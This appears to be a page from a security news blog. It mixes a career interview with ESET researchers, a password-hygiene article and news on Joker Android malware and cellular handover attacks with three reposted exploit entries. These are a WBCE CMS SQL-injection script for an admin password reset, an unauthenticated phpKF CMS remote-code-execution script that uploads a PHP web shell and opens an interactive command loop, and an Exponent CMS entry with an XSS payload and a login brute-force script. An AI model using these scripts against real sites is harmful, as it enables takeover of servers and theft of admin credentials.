Thursday, January 16, 2025
Home Blog Page 68

Cybersecurity careers: What to know and how to get started

By
Steven Black (n0tst3)
-
0
infosec news
infosec news

Want to help make technology safer for everyone?

Love solving puzzles? Looking for a rewarding career? Break into cybersecurity! Insights from ESET researchers Aryeh Goretsky and Cameron Camp will put you on the right track.
How do you start a career in cybersecurity? What qualifications, certifications and skills do you need? Should you spend half the cost of a house on a top-tier degree? Should you try to hack the Pentagon and get a reputation (which actually carries a whole pile of its own issues, so shouldn’t be pursued wholesale) or build your own Python library that helps cure cancer and try to get noticed?
These are some of the questions ESET folks are asked quite frequently. What better time to try and answer them than Cybersecurity Career Awareness Week, a campaign that runs this week and is part of Cybersecurity Awareness Month? The answers will come from two ESET researchers, who will weigh in on what it took in the past to break into security and what seems to be attracting the attention of companies of all stripes hiring today.

Indeed, demand for security professionals continues to outpace supply. The talent gap remains (de)pressing, not least because, you guessed it, security threats aren’t going anywhere. Nary an organization is immune from the myriad risks associated with cyberattacks, as threats escalate in size and frequency and hit ever closer to home, causing untold damage in the process (and in its aftermath). It’s little wonder, then, that many companies will pay top dollar to bring in and retain security talent, and it seems that the stars are aligned for those willing to seize the opportunities.
There’s more to the equation, though. Read on to find out as we sit down with two ESET experts who’ve worked in the trenches of security for decades – Distinguished Researcher Aryeh Goretsky and Specialized Security Researcher Cameron Camp.

First things first, why choose a career in cybersecurity?
Aryeh: There are the usual reasons for entering the cybersecurity field, such as seeking fame or fortune (or both), but a large part of the appeal to me is that it is one of the very few fields where a single person, armed only with their computer, their wits, and their persistence can actually make a difference in a measurable, noticeable way. Being in cybersecurity means that you have an opportunity (not a guarantee, mind you, but an opportunity) to do something that is impactful and helps others.
Keep in mind, though, that not every success is measured in how many CVEs you are credited for, or how much you have been paid from bug bounty programs. Success is ultimately an individual measurement, and the things you find bring you the most gratification may not be the things which bring you, say, the most attention in the media, social or otherwise.
But, with all that said and kept in mind, entering the practice of cybersecurity gives you access to opportunities that few other professions provide, in terms of both knowledge learned and knowledge applied.
Cameron: Get paid to break stuff for the greater good, move out of your mom’s basement. Terminally curious about how things work? Why do things break? How would you fix broken things, if given a chance? Basically, all the things you got in trouble for around your house growing up provide the impetus for a large portion of the researcher populations’ nascent talent and budding careers. All those things you took apart to find out how they work, much to your mom’s chagrin, could be the fodder for your success. While your popularity around home and school may have been regularly called into question, those same qualities are at home in hardware and software security.
How did you start and what drew you to cybersecurity?
Aryeh: There was nothing particularly magical about how I started, nor was it the result of particularly hard work.  All it took was a little initiative and, perhaps, a little luck: I knew John McAfee for several years prior to his starting his eponymous antivirus company. He appeared on the local TV news talking about computer viruses, and I thought, “Wow, that’s cool. I know him.”. Then, he appeared a second time, and I realized he might be on to something, business-wise. At the age of 19, with little experience and indeterminate career prospects, I decided to ask him for a job, figuring I could do office work like typing and faxing, which I figured he probably detested and would be happy to farm out. Surprisingly, enough, he hired me on the spot, and that’s how I became the first employee at McAfee Associates. After a few minutes spent explaining to me what computer viruses were, I was ready to take my first technical support phone call.
At the time, I knew I wanted to do something with computers, and was going to community college learning about them, but I wasn’t sure what I wanted to do with them, exactly. At McAfee Associates, I had a chance to learn about the very fast-paced business of computer security, and that allowed me to learn more about the underpinnings of hardware, software, and networking. Every day some new bit of knowledge came to me or some insight occurred. Now, over thirty years later, none of that has changed, except for my continued amazement at how the threats—and the defenses against them—have progressed.
Cameron: Celebration of short attention spans. It never felt like ‘real’ work because I was doing things I would’ve probably normally done anyway, and the pace of change is blistering, which makes my caffeine-riddled ADHD heart skip a beat. Really. But also, congealing constellations of seemingly disparate data together with the finest of threads into understanding a system seemed obvious to me, but apparently not to others.
What does your job actually involve? Let’s debunk some stereotypes …
Aryeh: A large portion of my job involves talking to people. Another large portion, and perhaps even a more important one, involves listening to them. Still more time is spent reading, which could be anything from a technical paper to social media to internal documentation. I also, on occasion, write things as well.
One of the things I like about my job is that is has a lot of variability about it. To give an example of how all this talking and listening works out in the real world, in the past week I have:
There are some longer-term ongoing activities I am involved in as well, such as a project with Cameron where we proactively hunt for false positive alarms in our threat detections. Having a false positive occur can be a very debilitating event for a business, so ESET works hard on preventing them.
Also, because it seems like once you do technical support for a living that you never really seem to escape the job, I helped a friend upgrade his installation of ESET Smart Security Premium to the newest version.
Cameron: More corporate/HR type stuff than I thought existed. Taking apart things is fine, but working for a company that sells stuff means you have to put things back together too, and deliver reports that are legible to people who don’t speak binary. That means most people. Or hex. You have to basically make sense to someone who will have a hand in selling or buying something hopefully useful. In short, you have to be a translator back into real-people speak so they’ll give you money, otherwise they stop.

What skills and qualifications do I need?
Aryeh: This is something of a harder question for me to answer, because I entered the field long before there were degrees in cybersecurity, and I also spent the first sixteen years of my career mostly focused on the support side of things.
But I would say that for an entry-level position – that is, one which requires zero to one years of experience – having an understanding of the fundamentals of how a computer’s hardware works, what an operating system does (including a high-level understanding of its various components), and how information is transmitted over networks is going to be a good starting point. If you are going to defend something, having a practical understanding of how it works is going to better help you envision what its weak points are, and how to defend those. With a good understanding of those fundamentals in place, you have a solid foundation on which to increase your knowledge, branch out and explore in the areas that interest you, and further educate yourself—hopefully with the help of your employer through additional skills training, tuition reimbursements and the like.
Cameron: As the industry grows and diversifies by actual job title this continues to change. In future installations we will be able to break this down further. Running backend servers (how I started) is very different than reversing malware. They certainly touch each other and work in the same ecosystem, but have very different daily routines. Either way, learn to natively work in the command line, it’s sort of the essence of what’s happening at a low level that ties everything together, the pretty screen is just to the icing on the digital cake. You’ll need to comfortable in these kinds of “stripped down” keyboard only environments, or at least it will put you ahead of others in the field.
Now on to college – should I do it, how much, and is a degree worth it?
Aryeh: Having a college degree can be important as it demonstrates to prospective employers a certain level of academic rigor and commitment, but getting a four-year degree may be impossible for students due to the high cost of secondary education in the United States. One way to ameliorate this is to take your general education courses at a community (two year) college and then transfer to a college or university to finish up your four-year degree. While some candidates worry that this approach may put them at a disadvantage to a hiring manager, it can also demonstrate the ability to execute long-range plans as well as a certain level of fiscal responsibility.
For someone who is mid-career and is looking either to shift careers or for a promotion, getting a master’s or a doctorate can definitely put you on the inside track.
Many employers are offering tuition reimbursement for employees to get a degree in a work-related field, and some offer payback for existing student loans as well. If you are interviewing for a job, be sure to ask about these as well as any other investments your prospective employer makes in their employee’s continuing education and professional development.
Now, with all of that said, I will point out that there are many candidates for whom the traditional four-year college approach is not an option. There are many free and low-cost courses you can take, as well as certifications available that show mastery of a subject. Depending upon whether the position you are interested in is an entry-level one, this might be a faster and less expensive way of getting your foot in the door than a degree.
Cameron: It’s not a bad thing to have, it gives would-be hiring companies some sort of baseline expectation, especially if it’s a brand name institution (you know I’m not going to name them, but you should be able to), assuring them potentially that you have the capacity to grasp the technology at hand and can help them make it better.
But it’s no guarantee. I’ve been in interviews with recently-minted computer science grads who I didn’t believe knew how to do much more than open a laptop. It was embarrassing. For the school and former student. And technology. Just bad. Also, I’ve been around folks who never driven past a college, but I believe they would the envy of any tech hiring panel. So it’s no guarantee. But it probably increases the likelihood you’d seem qualified to get you past the first round of the hiring process. But not guaranteed to get you hired.
Is there any best path? What should I study for a career in cybersecurity?
Aryeh: If there’s one thing I hope that I have made clear, there is no one single way that one gets into cybersecurity. I always encourage people who have some knowledge in another area to start by looking at what they are familiar with, and then try thinking about that area in terms of cybersecurity. What are the problems it uniquely faces? How might you solve those problems? Taking what you are already familiar with, and then thinking about how to secure it is a great way to begin bridging your career from its existing path into cybersecurity. And keep in mind, cybersecurity is a very broad field, there’s no one who is an expert in all of it. You want to find a niche that interests you, and focus on that aspect of the field. If you’re not sure exactly what interests you the most, start with your general education around cybersecurity concepts and try everything. Eventually, you will find a portion that is interesting to you, and that is where you should focus your studies.
As I mentioned previously, you need to start with an understanding of what it is you need to protect.  Having a general understanding of computers and networking, or even more specialized training in IT support and systems or network administration, is going to make you a much better cybersecurity practitioner.
Not all jobs in cybersecurity involve programming, but if you are going to be writing code, having a working knowledge of several different programming languages is a great start, because it lets you think about how you could solve a problem in different ways.
Keep in mind, though, that soft skills and skills that are tangential to your role are very important, too.  While you may want to learn all about attacking and defending computers, having an understanding of psychology can help understand an attacker’s motivations. Likewise, being able to communicate clearly, concisely and effectively to both individuals and groups of people is very important, whether it’s justifying the purchase of a new firewall, explaining the impact of a data breach to your C-suite, or asking for a raise.  And, regardless of whether you plan on having your own business or working for someone else, having an understanding of how a business operates can make a big difference, especially if you need to explain things according to the bottom line (e.g., money).
Cameron: It’s almost more important to meet the right people, otherwise you’re a collection of text for HR keyword search. Luckily, there are lots of free (or close) security events where you can reverse engineer what others are using to get jobs. One good way is to find an open-source project and figure out how to contribute to it. This means you have to figure out what projects are popular and widely used, how to get along with others who are working on the project and seem valuable enough for them to think you’re useful, then follow through and do the hard work of contributing something people use. Come to think of it, that’s kind of how a job works. So consider it practice, but without a 401K.

How do I start with little-to-no experience?
Aryeh: I would suggest doing two different things. The first is to focus on learning and building your skills.  This can be done by reading, listening to podcasts, watching videos, and asking questions on social media.  As you learn, take notes, write sample code (if that’s the direction you are moving in) and publish this information in your own personal website(s), such as a blog, wiki, code repository, and so forth. These do not have to be shared publicly, at least initially, but you should create a written record of what you are doing. You can even participate in open-source projects, which are also good for networking (the social kind) from a job’s perspective.
The second part of this is to look for entry-level jobs.  This can be by visiting the careers section of companies that you want to work for, searching the listings of local companies for entry-level positions, or, if you are in school, asking for assistance with career placement.  Your professor may even have some contacts with former students.
Once you submit your résumé or have your first interview, be sure to include links to your personal websites, as these can often show a prospective employer your thought processes, such as how you approach problems, and how you look for solutions.
Cameron: See my open-source comment above.
Certifications – who are they for and do they matter?
Aryeh:  Certifications are important in that they are a rubric for what you know, but I am also a proponent of experience.  In the past decade, we have had a profusion of certs.  While many of them are useful from a measurement perspective, some of them are dubious in value.  They can also be rather expensive, which I feel is a large financial burden to ask from entry-level prospects.  All too often, hiring organizations use degrees and certs as a gating mechanism for prospective hires.  I am not fond of this, because you can end up hiring someone who went to a cram school or who tests well, but has no practical experience and understanding of how things actually work.
While you may want to explore getting some of the least-expensive certs yourself, and they can help set you aside over other candidates for entry level positions, they are probably more useful to look at when hiring mid-range to senior employees, especially when a professional certification may be required for compliance reasons.  Requiring a CISSP, which is a certification for senior-level positions, as a pre-requisite for entry- or junior-level positions is a clear sign that an organization has structural failures, cybersecurity being only one of them.
Cameron: The usual suspects will certainly get you past the initial text scans so common amongst HR department searches. Things like CISSP are certainly near the top of the heap, but you have to match the cert with the intended target. CISSP, for example, is more about security management, whereas some certs are technical like CEH, which is much more focused in scope. So, unless you know your specific audience well, getting certs may mean you’ll just be collecting letters that may or may not result in a job, or at least the one you want. Target well.
To wrap up, how have remote and hybrid work impacted the security talent market? Where do you think we’re headed?
Aryeh: Remote and hybrid work have increased the talent pool in that companies no longer have to hire locally, or offer relocation packages. But it also means the number of applicants for a position have skyrocketed as well, because every job is potentially national or international in the scope of hiring.
A couple of final thoughts I would like to leave people with:
Firstly, that despite what we have heard, we do not necessarily have a huge number of cybersecurity jobs going unfulfilled. While it is easy to talk of a talent gap, it’s also important to understand the salary side of thing as well:  If there are fewer candidates to draw from, salaries have to go up. What we might have are employers that simply do not want to have to compete by paying high salaries.
And speaking of salaries, your desire may be to do the most technical thing there is to do in whatever part of the cybersecurity field that interests you. But there’s a good chance that the people in sales or legal are going to make far more money.  If amassing a large fortune is what’s important to you, consider wisely what you want to spend your time doing for the next forty years.
Cameron: You still have to build the brand of “You.” But you should be trying to do that anyway. Since you’re essentially selling your skills you allege you possess and getting others to agree. Think about online reviews, no one trusts the author of the software near as much as five other random people recommending it. Even if that methodology is weirdly flawed and open to gaming, so will yours be, and that “online score” of You will most certainly be called into the mix when trying to land a job. Also, don’t do Jell-O shots while dancing in a ring of fire on a bar and use that as your picture on LinkedIn. Long after that seemed like a good idea you’ll be paying for it. Even if you did dance in fire with Jell-O and you consider that a relevant skill highlighting your adaptability in a potential challenging potential work environment. It’s just not good form and will suggest you lack a certain sensibility. Also, you might be hung over during the interview, which is typically to be avoided unless you work during the early days of certain of our competitors. It’s your work to figure out which one(s).
In either case, curate your brand, whether that’s in real life or on the Internet, the two for you will become increasingly one, so choose carefully.
Thank you for your input!

source

Bookmark
Please login to bookmarkClose

WBCE CMS 1.5.1 – Admin Password Reset

By
Steven Black (n0tst3)
-
0
# Exploit Title: WBCE CMS 1.5.1 - Admin Password Reset
# Google Dork: intext: "Way Better Content Editing"
# Date: 20/12/2021
# Exploit Author: citril or https://github.com/maxway2021
# Vendor Homepage: https://wbce.org/
# Software Link: https://wbce.org/de/downloads/
# Version: <= 1.5.1
# Tested on: Linux
# CVE : CVE-2021-3817
# Github repo: https://github.com/WBCE/WBCE_CMS
# Writeup: https://medium.com/@citril/cve-2021-3817-from-sqli-to-plaintext-admin-password-recovery-13735773cc75

import requests

_url = 'http://localhost/wbce/admin/login/forgot/index.php' # from mylocalhost environment
_domain = 'pylibs.org' # you have to catch all emails! I used Namecheap domain controller's 'catch all emails and redirect to specific email address' feature

headers = {
    'User-Agent': 'Mozilla/5.0',
    'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Connection': 'close'
}

_p = "email=%27/**/or/**/user_id=1/**/or/**/'admin%40" + _domain + "&submit=justrandomvalue"

r = requests.post(url = _url, headers = headers, data = _p)
if r.status_code == 200:
    print('[+] Check your email, you are probably going to receive plaintext password which belongs to administrator.')
Bookmark
Please login to bookmarkClose

phpKF CMS 3.00 Beta y6 – Remote Code Execution (RCE) (Unauthenticated)

By
Steven Black (n0tst3)
-
0
# Exploit Title: phpKF CMS 3.00 Beta y6 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 18/12/2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://www.phpkf.com/
# Software Link: https://www.phpkf.com/indirme.php
# Version: 3.00
# Category: Webapps
# Tested on: Linux/Windows

# phpKF-CMS; It is a very popular content management system for promotion, news, shopping, corporate, friends, blogs and more.
# Contains an endpoint that allows remote access
# Necessary checks are not made in the file upload mechanism, only the file extension is checked
# The file with the extension ".png" can be uploaded and the extension can be changed.


# Example: python3 exploit.py -u http://example.com
#		   python3 exploit.py -u http://example.com -l admin -p Admin123


from bs4 import BeautifulSoup
from time import sleep
import requests
import argparse
import json

def main():
	parser = argparse.ArgumentParser(description='phpKF-CMS 3.00 Beta y6 - Remote Code Execution (Unauthenticated)')
	parser.add_argument('-u', '--host', type=str, required=True)
	parser.add_argument('-l', '--login', type=str, required=False)
	parser.add_argument('-p', '--password', type=str, required=False)
	args = parser.parse_args()
	print("\nphpKF-CMS 3.00 Beta y6 - Remote Code Execution (Unauthenticated)",
		  "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
	host(args)


def host(args):
	#Check http or https
	if args.host.startswith(('http://', 'https://')):
		print("[?] Check Url...\n")
		sleep(2)
		args.host = args.host
		if args.host.endswith('/'):
			args.host = args.host[:-1]
		else:
			pass
	else:
		print("\n[?] Check Adress...\n")
		sleep(2)
		args.host = "http://" + args.host
		args.host = args.host
		if args.host.endswith('/'):
			args.host = args.host[:-1]
		else:
			pass


	# Check Host Status
	try:
		response = requests.get(args.host)
		if response.status_code == 200:
			if args.login == None and args.password == None:
				create_user(args)
			else:
				login_user(args)
		else:
			print("[-] Address not reachable!")
			sleep(2)

	except requests.ConnectionError as exception:
		print("[-] Address not reachable!")
		sleep(2)
		exit(1)


def create_user(args):
	print("[*] Create User!\n")
	sleep(2)
	url = args.host + "/phpkf-bilesenler/kayit_yap.php"
	headers = {
			"Origin": args.host,
			"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
			"Referer": "http://fuzzing.com/uye-kayit.php",
			"Accept-Encoding": "gzip, deflate"
	}
	data = {
			"kayit_yapildi_mi": "form_dolu",
			"oturum": '', "kullanici_adi": "evil",
			"sifre": "Evil123",
			"sifre2": "Evil123",
			"posta": "evil@localhost.com",
			"kosul": "on"
	}
	response = requests.post(url, headers=headers, data=data, allow_redirects=True)
	args.login = ("evil")
	args.password = ("Evil123")
	print("[+] " + args.login + ":" + args.password + "\n")
	sleep(2)
	login_user(args)



def login_user(args):
	url = args.host + "/uye-giris.php"
	headers = {
			"Origin": args.host,
			"Content-Type": "application/x-www-form-urlencoded",
			"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
			"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
			"Referer": args.host + "/uye-giris.php",
			"Accept-Encoding": "gzip, deflate"
	}
	data = {
			"kayit_yapildi_mi": "form_dolu",
			"git": args.host + "/index.php",
			"kullanici_adi": args.login,
			"sifre": args.password,
			"hatirla": "on"
	}
	response = requests.post(url, headers=headers, data=data, allow_redirects=False)
	token = response.cookies.get("kullanici_kimlik")
	if (token != None):
		print("[!] Login Success!\n")
		sleep(2)
		upload_evil(args, token)
	else:
		if args.login == "evil" and args.password == "Evil123":
			print("[!] Unauthorized user!\n")
			print("[!] manually add a user and try again\n")
			print("[!] Go to link " + args.host + "/uye-kayit.php\n")
			print("python3 exploit.py -u '"+ args.host +"' -l 'attacker' -p 'p@ssW0rd'")
			sleep(2)
		else:
			print("[!] Unauthorized user!\n")
			sleep(2)


def upload_evil(args, token):
	url = args.host + "/phpkf-bilesenler/yukleme/index.php"
	cookies = {
			"kullanici_kimlik": token,
			"dil": "en"
	}
	headers = {
			"VERICEK": "",
			"DOSYA-ADI": "evil.png",
			"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
			"Content-type": "application/x-www-form-urlencoded; charset=utf-8",
			"Accept": "*/*",
			"Origin": args.host,
			"Referer": args.host + "/oi_yaz.php",
			"Accept-Encoding": "gzip, deflate"
	}
	data = "<?php if(isset($_GET['cmd'])){ $cmd = ($_GET['cmd']); system($cmd); die; } ?>"
	response = requests.post(url, headers=headers, cookies=cookies, data=data)

	if (response.text == "yuklendi"):
		print("[!] Upload Success!\n")
		sleep(2)
		change_name(args, token)
	else:
		print("[!] Upload Failed!\n")
		sleep(2)


def change_name(args, token):
	url = args.host + "/phpkf-bilesenler/yukleme/index.php"
	cookies = {
			"kullanici_kimlik": token,
			"dil": "en"
	}
	headers = {
			"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
			"Content-type": "application/x-www-form-urlencoded; charset=UTF-8",
			"Accept": "*/*",
			"Origin": args.host,
			"Referer": args.host + "/oi_yaz.php",
			"Accept-Encoding": "gzip, deflate"
	}
	data = {
			"yenidenadlandir": "evil.png|evil.php",
			"vericek": "/"
	}
	response = requests.post(url, headers=headers, cookies=cookies, data=data)
	if (response.text == "Name successfully changed..."):
		print("[!] Change Name evil.php!\n")
		sleep(2)
		find_dict(args, token)
	else:
		print("[!] Change Failed!\n")
		sleep(2)

def find_dict(args, token):
	url = args.host + "/phpkf-bilesenler/yukleme/index.php"
	cookies = {
			"kullanici_kimlik": token,
			"dil": "en"
	}
	headers = {
			"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36",
			"Content-type": "application/x-www-form-urlencoded; charset=UTF-8",
			"Accept": "*/*",
			"Origin": args.host,
			"Referer": args.host + "/oi_yaz.php",
			"Accept-Encoding": "gzip, deflate"
	}
	data = {
			"vericek": "/",
			"dds": "0"
	}
	response = requests.post(url, headers=headers, cookies=cookies, data=data)
	if (response.text == "You can not upload files!"):
		print("[!] File not found!\n")
		sleep(2)
	else:
		print("[!] Find Vuln File!\n")
		sleep(2)
		soup = BeautifulSoup(response.text, 'html.parser')
		path = soup.find("div").contents[1].replace(" ", "")
		exploit(args, path)


def exploit(args, path):
	print("[+] Exploit Done!\n")
	sleep(2)

	while True:
		cmd = input("$ ")
		url = args.host + path + "evil.php?cmd=" + cmd
		headers = {
			"Upgrade-Insecure-Requests": "1",
			"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
		}

		response = requests.post(url, headers=headers, timeout=5)

		if response.text == "":
			print(cmd + ": command not found\n")
		else:
			print(response.text)


if __name__ == '__main__':
	main()
Bookmark
Please login to bookmarkClose

Exponent CMS 2.6 – Multiple Vulnerabilities

By
Steven Black (n0tst3)
-
0
# Exploit Title: Exponent CMS 2.6 - Multiple Vulnerabilities
# Exploit Author: heinjame
# Date: 22/10/2021
# Exploit Author: picaro_o
# Vendor Homepage: https://www.exponentcms.org/
# Version: <=2.6
# Tested on: Linux os

*Stored XSS*

Affected parameter = >
http://127.0.0.1:8082/expcms/text/edit/id/{id}/src/@footer (Title,
Text Block)

Payload = <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">

** *Database credential are disclosed in response ***

POC
```
var adminerwindow = function (){
             var win =
window.open('/expcms/external/adminer/admin.php?server=localhost&username=root&db=exponentcms');
             if (!win) { err(); }
         }
```

**Authentication Bruteforce*
```
import argparse
import requests
import sys

parser = argparse.ArgumentParser()
parser.add_argument("url", help="URL")
parser.add_argument("Username list", help="Username List")
parser.add_argument("Password list", help="Password List")
pargs = parser.parse_args()

host = sys.argv[1]
userlist = sys.argv[2]
passlist = sys.argv[3]

try:
    readuser = open(userlist)
    readpass = open(passlist)
except:
    print("Unable to load files")
    exit()
def usernamebrute():
    s = requests.Session()
    for username in readuser.readlines():
        brute={
                'controller':(None,'users'),
                'src':(None,''),
                'int':(None,''),
                'action':(None,'send_new_password'),
                'username':(None,username.strip()),
        }
        bruteforce = s.post(host+"/index.php",files=brute)
        status = s.get(host+"/users/reset_password")
        if "administrator" in status.text:
            print("[+] Found username : "+ username)
            adminaccount = username
            checkpoint = True
            return adminaccount,checkpoint
            break

def passwordbrute(adminaccount):
    s = requests.Session()
    s.cookies.set("csrftoken", "abc")
    header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0)
Gecko/20100101 Firefox/78.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'COntent-TYpE': 'applicatiOn/x-WWW-fOrm-urlencoded1',
'Referer': host+'/login/showlogin'
    }
    for password in readpass.readlines():
        brute={
                'controller':'login',
                'src':'',
                'int':'',
                'action':'login',
                'username':adminaccount,
                'password':password.strip()
        }
        bruteforce = s.post(host+"/index.php",headers=header,data=brute)
        # print(bruteforce.text)
        status = s.get(host+"/login/showlogin",cookies=csrf)
        print(status.text)
        if "Invalid Username / Password" not in status.text:
            print("[+] Found Password : "+ password)
            break

adminaccount,checkpoint = usernamebrute()
if checkpoint == True:
    passwordbrute(adminaccount)
else:
    print("Can't find username,We can't proceed sorry :(")

```
Bookmark
Please login to bookmarkClose

A recipe for failure: Predictably poor passwords

By
Steven Black (n0tst3)
-
0
cybersecurity statistics
cybersecurity statistics

Security professionals advise to never use ‘beef stew’ as a password. It just isn’t stroganoff.
Passwords are the bane of everyone’s lives, but let’s face it – we all need them. And they aren’t going away as fast as Microsoft may want them to. For the time being, we will continue to depend on them for the unforeseeable future. You may have 50, 100, or even 200 online accounts but how many passwords do you have? Are they all unique? Well, here is one anecdote suggesting that people still only use the same few personalized passwords for all of their accounts.
I recently went to a conference hosted by a wealth management firm where they had invited me to present on cybersecurity. There were over 50 people in attendance and when I mentioned passwords, they did what so many people do when I mention the subject – they started looking around the room avoiding eye contact hoping not to be picked on. I quickly realized their body language was telling me they had poor password hygiene, so I decided to dig a little deeper and I asked them questions about their password management with some interesting responses.
I first asked if anyone used a password manager. One member of the audience put his hand up and said it was only because he had heard one of my talks in the past (I felt so humbled!). So, 98% of the people in the room did not use a password manager or have a system in place to take care of their accounts. I then asked them how they managed their online accounts and some owned up to using the same three or four passwords and many said these passwords included personal information such as special dates or names that meant something to them (wow, yes this was a facepalm moment where I really really tried to remain calm).


I decided to conduct a little experiment on the fly with one of the delegates. I have always found real life experiments to work wonders when ‘in the moment’ because if they work, it gets the audience members doing their homework before they go to bed that night.
With his permission, this particular gentleman allowed me to proceed, and I quickly found him on Facebook. I located all his public content and made a list on the whiteboard of the possible passwords that I imagined he could be using. I jotted down places of interest, pets’ names, children’s names, dates of interest, sports teams, books, music… all the classic possibilities. I had about 20 different words and numbers in a list. This was the shocking part where I felt like I had located buried treasure.
As he picked his jaw up off the floor, he not only said that I had found one of his passwords, but I found iterations of three of his four passwords he “uses for everything”. I later found out that the iterations were in fact missing a capital letter at the beginning and a number at the end (typical, hey?!). This number was always the same – the date of the month he was born. The crowd were perplexed that I had cracked his passwords. I was not. This is standard behavior and cybercriminals know it.
So it begs the question why anyone, especially with access to a huge amount of wealth, data and livelihoods, would still choose to use a password that is weak – on so many levels.
What is the future of the password? Are we able to truly go where humans haven’t properly ventured yet and attempt a true passwordless society? Or do you think, like me, that passwords and passphrases actually have a place in cyber-society and, when used well, they are actually a bonus. Unlike biometrics, there is no limit to how many you can have, plus you can store your passwords in a password manager and have it generate one for you. Furthermore, when used with multi-factor authentication such as an authenticator app or security key, the entry to an account is seamless and extremely easy for even the most entry-level user. I’ve even got my parents, in their mid-70s, using password managers alongside phone-based authenticator apps for all their accounts that support it – and they can’t stop telling me how easy it is!
One breach is enough to give a hacker access to all your accounts if you recycle passwords, so you may want to keep your passwords in a safe place. Many people already use Apple’s Keychain password manager or just save them in their browser. However, should your laptop or computer ever get stolen, and it is not full-disk encrypted, the potential hacker will still be able to be granted access with the computer even without seeing what the password is. Therefore, a third-party, cross-device password manager may be more beneficial.
Another top tip to keep your data safe and away from prying eyes or data breaches is by using a feature on Apple devices where it lets you hide your email address from other parties. ‘Sign In With Apple’ lets you anonymize your email address when logging into services that support the feature. In fact, more recently there has been an upgrade where iCloud users can make use of the feature called ‘Hide My Email’. This does exactly what it says by letting you generate a single-use address that forwards incoming emails to your real account. This way, if the data is ever compromised, your email address will remain safe!

source

Bookmark
Please login to bookmarkClose

500,000+ Android Users Downloaded a New Joker Malware App from Play Store

By
Steven Black (n0tst3)
-
0
923d19989a41696cefec45d69d9c14d7
923d19989a41696cefec45d69d9c14d7

A malicious Android app with more than 500,000 downloads from the Google Play app store has been found hosting malware that stealthily exfiltrates users’ contact lists to an attacker-controlled server and signs up users to unwanted paid premium subscriptions without their knowledge.

The latest Joker malware was found in a messaging-focused app named Color Message (“com.guo.smscolor.amessage”), which has since been removed from the official app marketplace. In addition, it has been observed simulating clicks in order to generate revenue from malicious ads and connecting to servers located in Russia.

Color Message “accesses users’ contact list and exfiltrates it over the network [and] automatically subscribes to unwanted paid services,” mobile security firm Pradeo noted. “To make it difficult to be removed, the application has the capability to hides it icon once installed.”

“We is [sic] committed to ensuring that the app is as useful and efficient as possible,” the developers behind Color Message state in their terms and conditions. “For that reason, we reserve the right to make changes to the app or to charge for its services, at any time and for any reason. We will never charge you for the app or its services without making it very clear to you exactly what you’re paying for.”

Joker, since its discovery in 2017, has been a notorious fleeceware infamous for carrying out an array of malicious activities, including billing fraud and intercepting SMS messages, contact details, and device information unbeknownst to users.

Android Malware
Rogue Apps

The rogue apps have continued to skirt Google Play protections using a barrage of evasion tactics to the point that Android’s Security and Privacy Team said the malware authors “have at some point used just about every cloaking and obfuscation technique under the sun in an attempt to go undetected.”

Bookmark
Please login to bookmarkClose

Global Mobile Network Vulnerabilities Affect All Cellular Generations Since 2G

By
Steven Black (n0tst3)
-
0
cybersecurity 1
cybersecurity 1

Global mobile network vulnerabilities are said to affect all cellular generations since 2G.

Researchers have disclosed security vulnerabilities in handover, a fundamental mechanism that undergirds modern cellular networks, which could be exploited by adversaries to launch denial-of-service (DoS) and man-in-the-middle (MitM) attacks using low-cost equipment.

The “vulnerabilities in the handover procedure are not limited to one handover case only but they impact all different handover cases and scenarios that are based on unverified measurement reports and signal strength thresholds,” researchers Evangelos Bitsikas and Christina Pöpper from the New York University Abu Dhabi said in a new paper. “The problem affects all generations since 2G (GSM), remaining unsolved so far.”

Handover, also known as handoff, is a process in telecommunications in which a phone call or a data session is transferred from one cell site (aka base station) to another cell tower without losing connectivity during the transmission. This method is crucial to establishing cellular communications, especially in scenarios when the user is on the move.

The routine typically works as follows: the user equipment (UE) sends signal strength measurements to the network to determine if a handover is necessary and, if so, facilitates the switch when a more suitable target station is discovered.

While these signal readings are cryptographically protected, the content in these reports is themselves not verified, thus allowing an attacker to force the device to move to a cell site operated by the attacker. The crux of the attack lies in the fact that the source base station is incapable of handling incorrect values in the measurement report, raising the possibility of a malicious handover without being detected.

The new fake base station attacks, in a nutshell, render vulnerable the handover procedures, which are based on the aforementioned encrypted measurement reports and signal power thresholds, effectively enabling the adversary to establish a MitM relay and even eavesdrop, drop, modify, and forward messages transmitted between the device and the network.

“If an attacker manipulates the content of the [measurement report] by including his/her measurements, then the network will process the bogus measurements,” the researchers said. “This is possible by imitating a legitimate base station and replaying its broadcast messages.”

“Attracting” the device to a fake base station

The starting point of the attack is an initial reconnaissance phase wherein the threat actor utilizes a smartphone to collect data pertaining to nearby legitimate stations and then uses this information to configure a rogue base station that impersonates a genuine cell station.

The attack subsequently involves forcing a victim’s device to connect to the false station by broadcasting master information block (MIB) and system information block (SIB) messages — information necessary to help the phone connect to the network — with a higher signal strength than the emulated base station.

